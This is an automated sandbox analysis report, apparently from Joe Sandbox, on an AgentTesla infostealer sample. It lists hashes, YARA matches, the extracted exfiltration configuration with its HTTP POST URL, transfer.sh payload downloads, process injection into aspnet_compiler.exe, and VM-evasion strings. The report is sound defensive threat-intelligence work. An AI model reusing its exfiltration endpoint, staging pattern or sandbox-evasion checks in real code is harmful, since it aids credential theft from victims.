Create Interactive Tour

Windows Analysis Report
AgentTesla.exe

Overview

General Information

Sample Name:	AgentTesla.exe
Analysis ID:	588752
MD5:	81448798cca71e2b8bce354afcf098b4
SHA1:	29c1fbbaad4d5b988b570741b733120801f7ebcc
SHA256:	c92c2d345803369fe8d343b1c894c1dc82e0c8b855c83d3cdb07c179e108aa78
Tags:	AgentTeslaexesigned
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Detected unpacking (changes PE section rights)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

.NET source code contains potential unpacker

.NET source code contains method to dynamically call methods (often used by packers)

PE file contains section with special chars

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sigma detected: Suspicious aspnet_compiler.exe Execution

PE file contains sections with non-standard names

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

AgentTesla.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\AgentTesla.exe" MD5: 81448798CCA71E2B8BCE354AFCF098B4)

aspnet_compiler.exe (PID: 1248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

cleanup

Malware Configuration

Threatname: Agenttesla

{
  "Exfil Mode": "Http",
  "HTTP method": "Post",
  "Post URL": "https://agusanplantation.com/v/v/inc/9c523a9e14cc09.php",
  "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
AgentTesla.exe	SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1	Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022	Florian Roth

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: AgentTesla.exe PID: 6368	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.AgentTesla.exe.6ec9a88.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.AgentTesla.exe.6ec9a88.6.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.AgentTesla.exe.6ec9a88.6.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2efaf:$s1: get_kbok 0x2f8e3:$s2: get_CHoo 0x3053e:$s3: set_passwordIsSet 0x2edb3:$s4: get_enableLog 0x3347f:$s8: torbrowser 0x31e62:$s10: logins 0x317da:$s11: credential 0x2e19b:$g1: get_Clipboard 0x2e1a9:$g2: get_Keyboard 0x2e1b6:$g3: get_Password 0x2f791:$g4: get_CtrlKeyDown 0x2f7a1:$g5: get_ShiftKeyDown 0x2f7b2:$g6: get_AltKeyDown
0.2.AgentTesla.exe.6ec9a88.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.AgentTesla.exe.6ec9a88.6.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.AgentTesla.exe.6ec9a88.6.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30daf:$s1: get_kbok 0x316e3:$s2: get_CHoo 0x3233e:$s3: set_passwordIsSet 0x30bb3:$s4: get_enableLog 0x3527f:$s8: torbrowser 0x33c62:$s10: logins 0x335da:$s11: credential 0x2ff9b:$g1: get_Clipboard 0x2ffa9:$g2: get_Keyboard 0x2ffb6:$g3: get_Password 0x31591:$g4: get_CtrlKeyDown 0x315a1:$g5: get_ShiftKeyDown 0x315b2:$g6: get_AltKeyDown
Click to see the 1 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\AgentTesla.exe" , ParentImage: C:\Users\user\Desktop\AgentTesla.exe, ParentProcessId: 6368, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 1248

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.AgentTesla.exe.6ec9a88.6.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://agusanplantation.com/v/v/inc/9c523a9e14cc09.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Multi AV Scanner detection for submitted file

Source: AgentTesla.exe	Virustotal: Detection: 31%			Perma Link
Source: AgentTesla.exe	ReversingLabs: Detection: 44%

Source: AgentTesla.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49767 version: TLS 1.2

Source:	Binary string: DDDHJYUTYE.pdb source: AgentTesla.exe, AgentTesla.exe, 00000000.00000002.381081801.0000000001312000.00000040.00000001.01000000.00000003.sdmp, AgentTesla.exe, 00000000.00000003.349626224.0000000001040000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\scljenkins-slv\workspace\Build-Job_ADLM_FY21-10.2-release@2\develop\global\src\build\win32\MSVS14\Release\Release\adlmint.pdb source: AgentTesla.exe
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AgentTesla.exe, 00000000.00000002.381808674.000000000157E000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Bellbellbell.pdb source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp, AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmp

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /get/jwhuCr/devvvv.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/iGs052/BASE64.txt HTTP/1.1Host: transfer.sh

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: AgentTesla.exe	String found in binary or memory: http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/m
Source: AgentTesla.exe, 00000000.00000002.380753556.00000000009A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AgentTesla.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: AgentTesla.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: AgentTesla.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: AgentTesla.exe	String found in binary or memory: http://rb.symcb.com/rb.crl0W
Source: AgentTesla.exe	String found in binary or memory: http://rb.symcb.com/rb.crt0
Source: AgentTesla.exe	String found in binary or memory: http://rb.symcd.com0&
Source: AgentTesla.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: AgentTesla.exe	String found in binary or memory: http://s.symcd.com0
Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AgentTesla.exe	String found in binary or memory: http://www.macrovision.com/fnp/2004/11/activation
Source: AgentTesla.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: AgentTesla.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: AgentTesla.exe	String found in binary or memory: https://d.symcb.com/rpa06
Source: AgentTesla.exe	String found in binary or memory: https://sectigo.com/CPS0D
Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh
Source: AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/jwhuCr/devvvv.txt
Source: AgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /get/jwhuCr/devvvv.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/iGs052/BASE64.txt HTTP/1.1Host: transfer.sh

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.7:49767 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

PE file contains section with special chars

Source: AgentTesla.exe

Static PE information: section name:

Source: AgentTesla.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: AgentTesla.exe, type: SAMPLE	Matched rule: SUSP_NVIDIA_LAPSUS_Leak_Compromised_Cert_Mar22_1 date = 2022-03-03, author = Florian Roth, description = Detects a binary signed with the leaked NVIDIA certifcate and compiled after March 1st 2022, score = https://twitter.com/cyb3rops/status/1499514240008437762, modified = 2022-03-04
Source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_01140448	0_2_01140448
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_011484B0	0_2_011484B0
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_01140417	0_2_01140417
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_011408B8	0_2_011408B8
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_011408A8	0_2_011408A8
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_01140B58	0_2_01140B58
Source: C:\Users\user\Desktop\AgentTesla.exe	Code function: 0_2_01140B49	0_2_01140B49

Source: AgentTesla.exe

Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows

Source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBellbellbell.dll: vs AgentTesla.exe
Source: AgentTesla.exe, 00000000.00000002.380619435.0000000000930000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AgentTesla.exe
Source: AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBellbellbell.dll: vs AgentTesla.exe
Source: AgentTesla.exe, 00000000.00000002.381772595.000000000155F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDDDHJYUTYE.exe8 vs AgentTesla.exe
Source: AgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehHUWRBgosOmdPBogRCMhHNGgzDCudeuFBxvz.exe4 vs AgentTesla.exe
Source: AgentTesla.exe	Binary or memory string: OriginalFilenameDDDHJYUTYE.exe8 vs AgentTesla.exe

Source: AgentTesla.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AgentTesla.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AgentTesla.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: AgentTesla.exe

Static PE information: invalid certificate

Source: AgentTesla.exe

Static PE information: Section: ZLIB complexity 1.00027760428

Source: AgentTesla.exe	Virustotal: Detection: 31%
Source: AgentTesla.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\AgentTesla.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AgentTesla.exe "C:\Users\user\Desktop\AgentTesla.exe"
Source: C:\Users\user\Desktop\AgentTesla.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Desktop\AgentTesla.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AgentTesla.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF6462815E21D3E8A8.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/2@1/1

Source: C:\Users\user\Desktop\AgentTesla.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: AgentTesla.exe	String found in binary or memory: or the hosts file is incorrect. Workaround: Use IP-Address
Source: AgentTesla.exe	String found in binary or memory: lmutil lmborrow -startupdate was issued but not updated yet.
Source: AgentTesla.exe	String found in binary or memory: lmpath command.Trusted Storage is invalid, and needs to be repaired.SUPERSEDE and SUPERSEDE_SIGN can not be used at the same time.Hostname lmutil lmborrow -startupdate was issued but not updated yet.
Source: AgentTesla.exe	String found in binary or memory: Insufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-start
Source: AgentTesla.exe	String found in binary or memory: The FlexNet Licensing Service is marked for delete - reboot & then re-install
Source: AgentTesla.exe	String found in binary or memory: Insufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-start
Source: AgentTesla.exe	String found in binary or memory: The FlexNet Licensing Service is incorrectly configured; please re-install
Source: AgentTesla.exe	String found in binary or memory: \\.\pipe\FlexNet Licensing ServiceABF27A87-DC96-4b05-A06B-83EB2749B800The FlexNet Licensing Service failed to startCould not create named pipeCould not open named pipe: 1 second wait timed outNot able to open the named pipe handleNot able to write to the named pipeThe FlexNet Licensing Service is disabledInsufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-startThe FlexNet Licensing Service is not installedThe FlexNet Licensing Service is marked for delete - reboot & then re-installThe FlexNet Licensing Service is already running - no action requiredInsufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-startThe Windows Service Control Manager has a database lock - check which app is using itThe FlexNet Licensing Service is incorrectly configured; please re-installThe FlexNet Licensing Service is not installedFlexNet Licensing Service%^%^%^VMAttrs%u
Source: AgentTesla.exe	String found in binary or memory: \\.\pipe\FlexNet Licensing ServiceABF27A87-DC96-4b05-A06B-83EB2749B800The FlexNet Licensing Service failed to startCould not create named pipeCould not open named pipe: 1 second wait timed outNot able to open the named pipe handleNot able to write to the named pipeThe FlexNet Licensing Service is disabledInsufficient privilege to talk to the Windows Service Control Manager - set the FlexNet Licensing Service to auto-startThe FlexNet Licensing Service is not installedThe FlexNet Licensing Service is marked for delete - reboot & then re-installThe FlexNet Licensing Service is already running - no action requiredInsufficient privilege to talk to the FlexNet Licensing Service - set the service to auto-startThe Windows Service Control Manager has a database lock - check which app is using itThe FlexNet Licensing Service is incorrectly configured; please re-installThe FlexNet Licensing Service is not installedFlexNet Licensing Service%^%^%^VMAttrs%u

Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\AgentTesla.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: AgentTesla.exe

Static file information: File size 7255264 > 1048576

Source: AgentTesla.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x257400
Source: AgentTesla.exe	Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x48b3c9

Source:	Binary string: DDDHJYUTYE.pdb source: AgentTesla.exe, AgentTesla.exe, 00000000.00000002.381081801.0000000001312000.00000040.00000001.01000000.00000003.sdmp, AgentTesla.exe, 00000000.00000003.349626224.0000000001040000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\scljenkins-slv\workspace\Build-Job_ADLM_FY21-10.2-release@2\develop\global\src\build\win32\MSVS14\Release\Release\adlmint.pdb source: AgentTesla.exe
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: AgentTesla.exe, 00000000.00000002.381808674.000000000157E000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Bellbellbell.pdb source: AgentTesla.exe, 00000000.00000002.388340755.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp, AgentTesla.exe, 00000000.00000002.387753508.0000000005400000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\AgentTesla.exe

Unpacked PE file: 0.2.AgentTesla.exe.1310000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.winlice:EW;.boot:ER; vs :ER;.rsrc:R;

.NET source code contains potential unpacker

Source: 0.2.AgentTesla.exe.1310000.0.unpack, e1ccJ0qv7RfG4GSGJI/FPJA5U6Tu7mmnQx7dF.cs

.Net Code: PtNESGOel System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.cs

.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\Desktop\AgentTesla.exe

Code function: 0_2_01144173 push cs; retf

0_2_01144174

Source: AgentTesla.exe	Static PE information: section name:
Source: AgentTesla.exe	Static PE information: section name: .imports
Source: AgentTesla.exe	Static PE information: section name: .winlice
Source: AgentTesla.exe	Static PE information: section name: .boot

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: initial sample

Static PE information: section name: entropy: 7.95088629607

Source: 0.2.AgentTesla.exe.1310000.0.unpack, vow0il84A6EO1Kr9ou/SCN2OOxFlCTgsvtZ3Y.cs	High entropy of concatenated method names: '.cctor', 'jJwiO5tbmtsyW', 'w73O15vWR', 'feM0EvWfY', 'AxF4YwBNM', 'yMtXnt5D3', 'MEOIm1N42', 'GdCdovfPQ', 'DqIsAtvRa', 'IkWRbRNOA'
Source: 0.2.AgentTesla.exe.1310000.0.unpack, DDDHJYUTYE/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'FPJ6A5UTu', 'x6xvqGw9ckUH4OCF25', 'rVBNEbVbRZuttbPJB1', 'aJetrv5ApVyjpETkX2', 'sgTBxlW3ZrPY4gDaV6', 'UR2fE9kFq1rMVGUUt8', 'ChtyYB85Lepmjx3QNq', 'oXVFAwBNmUELkiZOPw'
Source: 0.2.AgentTesla.exe.1310000.0.unpack, e1ccJ0qv7RfG4GSGJI/FPJA5U6Tu7mmnQx7dF.cs	High entropy of concatenated method names: 'PtNESGOel', 'HJpJAPsTL', 'YEf0ulT8HOoJV8FjlH', 'G5vQ10SRpLbIjy9m1B', 'tShhgdG9BU6r5sbnGw', 'KSrpRDY7Wsh3I3Z38d', 'mN7PmYNA0xZoLtOPor'

Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\AgentTesla.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\AgentTesla.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe TID: 6236	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe TID: 4224	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

System information queried: ModuleInformation

Jump to behavior

Source: AgentTesla.exe	Binary or memory string: VMware
Source: AgentTesla.exe	Binary or memory string: GoogleCompute detectedAmazonEC2 detectedVMWare detectedXEN detectedQEMU detectedUnknown hypervisor detectedHyper-V detectedCorrection - XEN detectedCorrection - CPUID data block search indicates QEMU detectedCorrection - WMI indicates Physical machinePhysical machine detectedXEN detectedVMWare detectedVirtualBox detectedQemu detectedParallels detectedUnknown hypervisor detectedUnknown hypervisor detectedPhysical machine detectedHypervisor detectedFAKE VM detectedLocal\{a3d0d9cf-ef71-409f-acb2-91dca7237f13}-%lx-s_vm_initHypervisor detectedFAKE VM detected (non-privileged)CPUID Hyper-V Signature rejectedflexFilterServerNew: Could not alloc memoryflexFilterServerConnect: Could not get inet address
Source: AgentTesla.exe	Binary or memory string: VMwareVMware detected
Source: AgentTesla.exe	Binary or memory string: Qemu detected
Source: AgentTesla.exe	Binary or memory string: QEMU Virtual CPU
Source: AgentTesla.exe	Binary or memory string: WMI checking for VM_WMI_QEMU
Source: AgentTesla.exe	Binary or memory string: VMWare detected
Source: AgentTesla.exe	Binary or memory string: Populating VMWARE Attributes....
